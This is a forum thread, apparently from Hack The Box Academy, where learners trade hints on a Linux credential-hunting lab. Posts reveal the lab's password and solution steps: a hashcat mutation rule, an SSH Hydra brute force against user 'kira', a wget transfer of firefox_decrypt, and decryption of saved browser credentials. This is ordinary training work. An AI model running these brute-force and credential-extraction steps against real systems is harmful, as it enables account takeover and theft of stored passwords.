PASSWORD ATTACK | ACADEMY - Credential Hunting in Linux

Friends, Enemies

I have a password of Kira’s user.

“Do I need to resort to SSH brute-forcing? I’ve been lingering around port 445 for quite some time.”

“I couldn’t find anonymous login on port 21, and there’s no file sharing on port 445 either. Only port 22 is left. I’m frustrated about how to connect to this Linux machine.”

You need to make a dictionary attack on ssh port with user kira lower case.

First you need to mutation the password that you can get in hunt description.
The common error is that we mutuation the password.list dowloaded from the Resource. This is the problem. You need to make a file with only 1 password. So, mutation this password.

“Thank you for your response. I’m going to handle it now.”

hello im stuck in this module

im connect to ssh kira but in dont find will password

I got in ssh as kira. Now tryingto decrypt firefox is throwing an error. Anyone else have this problem? Looking for a nudge.

Select the Mozilla profile you wish to decrypt
1 → lktd9y8y.default
2 → ytb95ytb.default-release
2024-04-22 01:31:52,781 - ERROR - Couldn’t initialize NSS, maybe ‘/home/kira/.mozilla/firefox/ytb95ytb.default-release’ is not a valid profile?

I also have the password, but I am encountering a strange event. When I try to ssh kira@
Connection closed by port 22
I also tried ssh but after waiting for minutes, it doesen’t gives any response. I am very confused what to do since I have the cracked password from using Hydra but since I don’t get any response from ssh, I don’t know what to do.

I no have idea of the situation. Try to look the state of the port with nmap before start with scan and look if is closed or filtered.


1 Like

There has to be something wrong with the instance your are connecting to. I have had a ton of issues network related on HTB for the last two weeks.

your hint is amazing bro, big thanks

1 Like

hello hey this my first time posting something on this community …i already solve this path and here i leave how i did it
1 . create a file with the password Loveyou1 using the custom.rule hashcat --force /home//password1k.txt -r custom.rule --stdout | sort -u > mut_password4.list

  1. use hydra to crack the new password hydra -l kira -P /home/xxx/mut_password.list

  2. read the bash_history carefully
    thank you and good luck

1 Like

Hi there, I have found “authorized_keys”, although what should I do after this? I tried to use, but it shows “no file or directory”. Please give me a hint.

Read the bash_history to use the download it on your attacker machine and then use python to transfer the file to your target

Download the resources zip file and extract them from the top of the page

echo "Loveyou1" | hashcat --force -r Downloads/custom.rule --stdout | sort -u > mutated-passwords

cat mutated-passwords

Is anyone else having an issue with resolving the host?

kira@nix01:~$ git clone
Cloning into 'firefox_decrypt'...
fatal: unable to access '': Could not resolve host:


I solved it by creating a simple python server connection between the two:

cd /home/user/firefox_decrypt
python3 -m http.server 8000
wget http://<attack-ip>:8000 -r -np -nH --cut-dirs=1

I hope this helps anyone who might be stuck

For the past few months I have found tremendous value from the community with HTB. I wanted to make my first post, hoping to contribute to the community with some guidance.

If you’re like me and having problems with some of the password challenges, make sure that you read up on various file transfer methods out there. Do not limit yourself to HTB.

I found this video on youtube to be very helpful,

Combine that video with the help from the posts above.

Cheers, thank you HTB community.